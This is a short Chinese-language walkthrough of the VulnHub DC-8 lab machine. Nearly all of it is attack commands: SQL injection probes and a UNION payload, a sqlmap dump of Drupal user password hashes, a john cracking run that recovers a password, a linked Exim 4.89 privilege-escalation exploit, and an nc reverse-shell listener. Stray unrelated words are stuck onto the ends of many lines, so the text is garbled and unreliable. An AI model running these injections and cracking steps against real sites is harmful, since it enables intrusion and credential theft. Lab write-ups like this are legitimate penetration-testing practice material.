鏡像下載連接:sql
https://www.vulnhub.com/entry/dc-8,367/#downloadgoogle
主機掃描:scala
http://10.10.202.131/?nid=2%273d
http://10.10.202.131/?nid=2%20and%201=2 # falseblog
http://10.10.202.131/?nid=2%20and%201=1 # trueget
http://10.10.202.131/?nid=-2+union+select++(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))+it
╰─ sqlmap -u "http://10.10.202.131/?nid=1" --dbs --batch -D d7db -T users -C name,pass,init --dumpio
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | dc8blah@dc8blah.org |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | john@blahsdfsfd.org |select
# john --wordlist=/usr/share/wordlists/rockyou.txt druphshmap
john/turtle
進行提權操做:
google: exim 4.89 privilege escalation
https://www.exploit-db.com/exploits/46996
nc -lvvp 4444
OVER!